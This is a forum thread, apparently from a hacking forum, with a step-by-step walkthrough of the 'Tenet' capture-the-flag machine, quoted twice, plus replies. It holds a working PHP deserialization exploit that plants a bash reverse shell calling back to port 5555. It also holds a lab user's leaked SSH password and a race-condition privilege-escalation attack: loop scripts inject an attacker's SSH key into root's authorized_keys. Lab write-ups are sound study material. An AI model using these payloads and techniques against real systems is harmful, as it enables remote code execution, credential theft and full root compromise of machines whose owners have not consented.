FLAG Tenet Writeup FREE
by dory23 - January 17, 2021 at 08:40 PM
1. While checking tenet.htb, we can see a comment by neil mentioning that there is a backup called sator.
2. Add sator.tenet.htb to /etc/hosts.
3. Remembering that there is a sator.php.bak on sator.tenet.htb, we can access it at sator.tenet.htb/sator.php.bak.
4. While checking the code we can see it is vulnerable to PHP object injection, i.e. insecure deserialization.
  - Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
We will just edit the code, from this:


<?php

/**
 * Writes $data to $user_file (relative to this script's directory) when the
 * object is destroyed.
 *
 * NOTE(review): because the top-level code below passes request input to
 * unserialize(), both public properties can be set by the client and
 * __destruct() then runs with those values. Nothing here validates
 * $user_file (no basename()/extension check) or $data, so the destructor
 * amounts to an arbitrary file write relative to the script's directory.
 * Mitigation belongs at the unserialize() call (allowed_classes => false, or
 * use JSON instead of PHP serialization) and, defensively, in __destruct()
 * (reject a $user_file containing a path separator; only write when the
 * object was created through the normal constructor path).
 */
class DatabaseExport
{
        // File name written by __destruct(); joined to __DIR__ without validation.
        public $user_file = 'users.txt';
        // Content written by __destruct().
        public $data = '';

        /**
         * Stub: only sets $data to 'Success'. Despite the message it prints,
         * no users file is read here.
         */
        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        /**
         * Persists $data to __DIR__ . '/' . $user_file.
         * Runs for every instance, including objects produced by unserialize().
         */
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

// The 'arepo' query parameter is handed straight to unserialize().
$input = $_GET['arepo'] ?? '';
// SECURITY: unserialize() on client-controlled data instantiates whatever
// class the payload names, with attacker-chosen property values; the
// DatabaseExport destructor above then performs a file write with them
// (PHP object injection). Fix: unserialize($input, ['allowed_classes' => false])
// or stop accepting serialized PHP and use json_decode(). The result is not
// used anywhere below.
$databaseupdate = unserialize($input);

// Normal flow: a fresh instance whose destructor writes 'Success' to users.txt.
$app = new DatabaseExport;
$app -> update_db();


?>

to this:



<?php
/**
 * Local copy of the target's DatabaseExport class, present only so that
 * serialize() yields an object of the same class name with the two public
 * properties set as below. Only property names and values are serialized;
 * method bodies are not, so the __destruct() here is not what the server
 * runs — the server runs its own. It does still fire locally when this
 * script exits, so test.php is also written next to this script.
 */
class DatabaseExport
{
        // File name the target's destructor writes, relative to its script directory.
        public $user_file = 'test.php';
    // Content the target's destructor writes into that file.
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';

        // Same body as the server-side class; see the class comment on why it
        // is not needed for the serialized form.
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

// First request: the serialized object is sent as 'arepo'; the target
// unserializes it and its destructor writes $data into $user_file.
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
// Second request: fetching the written file has the server execute it.
// Note: this overwrites $response from the first request, and neither
// return value is checked (file_get_contents() returns false on failure).
$response = file_get_contents("http://10.10.10.223/test.php");

?>

5. Then we will get a reverse shell on port 5555.
6. After getting a reverse shell, check wordpress/wp-config.php; it contains neil's credentials.

neil
Opera2113

7. SSH in as neil to get user.txt.
8. With sudo -l we can see that /usr/local/bin/enableSSH.sh can be run as root.
9. By checking the code we can see there is a race condition:
<snipped>
# addKey: appends $key to root's authorized_keys by way of a temporary file.
# Part of enableSSH.sh, which step 8 shows is runnable as root via sudo.
# $key and checkFile are defined in the snipped part of the script.
addKey() {

        # mktemp -u only generates a name; it does not create the file. The
        # /tmp/ssh-XXXXXXXX pattern is discoverable by any local user with a glob.
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        # umask 110 clears only execute bits, so touch creates the file as
        # 0666: world-writable. Any local user can change it while this runs.
        (umask 110; touch $tmpName)

        # $key is unquoted, so word splitting and globbing apply to its contents.
        /bin/echo $key >>$tmpName

        # Start of the TOCTOU window: the file is validated here...
        checkFile $tmpName

        # ...but can be rewritten by another user before it is appended to
        # root's authorized_keys. Fix: create the file with mktemp (no -u,
        # which creates it 0600) under umask 077, or drop the temp file and
        # validate $key in memory before appending.
        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}


10. Generate an id_rsa key pair using ssh-keygen -t rsa.
11. Then, on the 10.10.10.223 machine, create add_rsa.sh:

# add_rsa.sh: keeps overwriting every file matching /tmp/ssh-* so that, when
# it lands inside addKey's window between checkFile and cat, the appended
# content is this line rather than the script's own key. "ssh-rsa key" stands
# for the public key generated in step 10. Caveat: if nothing matches the
# glob, tee creates a file literally named /tmp/ssh-*. Runs until interrupted.
while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

12. Then create a script that runs enableSSH.sh in a loop and name it 1.sh:

# 1.sh: invokes the root-run script repeatedly so addKey's temp-file window
# keeps reopening while add_rsa.sh is writing. Runs until interrupted.
while true
do
sudo /usr/local/bin/enableSSH.sh
done


13. chmod 600 id_rsa; then, after a few seconds or minutes, SSH in as root:
14. ssh -i id_rsa [email protected]


if you liked the writeup give rep up and 
Thank you, I just finished this one!
USER

ssh [email protected]

Passwd: Opera2112

(January 17, 2021 at 08:40 PM)dory23 Wrote: 1. While checking tenet.htb, we can see a comment by neil mentioning that there is a backup called sator.
2. Add sator.tenet.htb to /etc/hosts.
3. Remembering that there is a sator.php.bak on sator.tenet.htb, we can access it at sator.tenet.htb/sator.php.bak.
4. While checking the code we can see it is vulnerable to PHP object injection, i.e. insecure deserialization.
  - Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
We will just edit the code, from this:


<?php

/**
 * Writes $data to $user_file (relative to this script's directory) when the
 * object is destroyed.
 *
 * NOTE(review): because the top-level code below passes request input to
 * unserialize(), both public properties can be set by the client and
 * __destruct() then runs with those values. Nothing here validates
 * $user_file (no basename()/extension check) or $data, so the destructor
 * amounts to an arbitrary file write relative to the script's directory.
 * Mitigation belongs at the unserialize() call (allowed_classes => false, or
 * use JSON instead of PHP serialization) and, defensively, in __destruct()
 * (reject a $user_file containing a path separator; only write when the
 * object was created through the normal constructor path).
 */
class DatabaseExport
{
        // File name written by __destruct(); joined to __DIR__ without validation.
        public $user_file = 'users.txt';
        // Content written by __destruct().
        public $data = '';

        /**
         * Stub: only sets $data to 'Success'. Despite the message it prints,
         * no users file is read here.
         */
        public function update_db()
        {
                echo '[+] Grabbing users from text file <br>';
                $this-> data = 'Success';
        }


        /**
         * Persists $data to __DIR__ . '/' . $user_file.
         * Runs for every instance, including objects produced by unserialize().
         */
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated <br>';
        //      echo 'Gotta get this working properly...';
        }
}

// The 'arepo' query parameter is handed straight to unserialize().
$input = $_GET['arepo'] ?? '';
// SECURITY: unserialize() on client-controlled data instantiates whatever
// class the payload names, with attacker-chosen property values; the
// DatabaseExport destructor above then performs a file write with them
// (PHP object injection). Fix: unserialize($input, ['allowed_classes' => false])
// or stop accepting serialized PHP and use json_decode(). The result is not
// used anywhere below.
$databaseupdate = unserialize($input);

// Normal flow: a fresh instance whose destructor writes 'Success' to users.txt.
$app = new DatabaseExport;
$app -> update_db();


?>

to this:



<?php
/**
 * Local copy of the target's DatabaseExport class, present only so that
 * serialize() yields an object of the same class name with the two public
 * properties set as below. Only property names and values are serialized;
 * method bodies are not, so the __destruct() here is not what the server
 * runs — the server runs its own. It does still fire locally when this
 * script exits, so test.php is also written next to this script.
 */
class DatabaseExport
{
        // File name the target's destructor writes, relative to its script directory.
        public $user_file = 'test.php';
    // Content the target's destructor writes into that file.
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';

        // Same body as the server-side class; see the class comment on why it
        // is not needed for the serialized form.
        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

// First request: the serialized object is sent as 'arepo'; the target
// unserializes it and its destructor writes $data into $user_file.
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
// Second request: fetching the written file has the server execute it.
// Note: this overwrites $response from the first request, and neither
// return value is checked (file_get_contents() returns false on failure).
$response = file_get_contents("http://10.10.10.223/test.php");

?>

5. Then we will get a reverse shell on port 5555.
6. After getting a reverse shell, check wordpress/wp-config.php; it contains neil's credentials.

neil
Opera2113

7. SSH in as neil to get user.txt.
8. With sudo -l we can see that /usr/local/bin/enableSSH.sh can be run as root.
9. By checking the code we can see there is a race condition:
<snipped>
# addKey: appends $key to root's authorized_keys by way of a temporary file.
# Part of enableSSH.sh, which step 8 shows is runnable as root via sudo.
# $key and checkFile are defined in the snipped part of the script.
addKey() {

        # mktemp -u only generates a name; it does not create the file. The
        # /tmp/ssh-XXXXXXXX pattern is discoverable by any local user with a glob.
        tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)

        # umask 110 clears only execute bits, so touch creates the file as
        # 0666: world-writable. Any local user can change it while this runs.
        (umask 110; touch $tmpName)

        # $key is unquoted, so word splitting and globbing apply to its contents.
        /bin/echo $key >>$tmpName

        # Start of the TOCTOU window: the file is validated here...
        checkFile $tmpName

        # ...but can be rewritten by another user before it is appended to
        # root's authorized_keys. Fix: create the file with mktemp (no -u,
        # which creates it 0600) under umask 077, or drop the temp file and
        # validate $key in memory before appending.
        /bin/cat $tmpName >>/root/.ssh/authorized_keys

        /bin/rm $tmpName

}


10. Generate an id_rsa key pair using ssh-keygen -t rsa.
11. Then, on the 10.10.10.223 machine, create add_rsa.sh:

# add_rsa.sh: keeps overwriting every file matching /tmp/ssh-* so that, when
# it lands inside addKey's window between checkFile and cat, the appended
# content is this line rather than the script's own key. "ssh-rsa key" stands
# for the public key generated in step 10. Caveat: if nothing matches the
# glob, tee creates a file literally named /tmp/ssh-*. Runs until interrupted.
while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

12. Then create a script that runs enableSSH.sh in a loop and name it 1.sh:

# 1.sh: invokes the root-run script repeatedly so addKey's temp-file window
# keeps reopening while add_rsa.sh is writing. Runs until interrupted.
while true
do
sudo /usr/local/bin/enableSSH.sh
done


13. chmod 600 id_rsa; then, after a few seconds or minutes, SSH in as root:
14. ssh -i id_rsa [email protected]


if you liked the writeup give rep up and 

Thank you bro, you're doing great.
Bumping to the first page.
How can I *change* the php code on the server? Is there some upload method?
(February 03, 2021 at 08:37 PM)b1tl0rd Wrote: How can I *change* the php code on the server? Is there some upload method?

Run it from your side using PHP.
You wrote the wrong password for neil: it's not Opera2113, it's Opera2112.
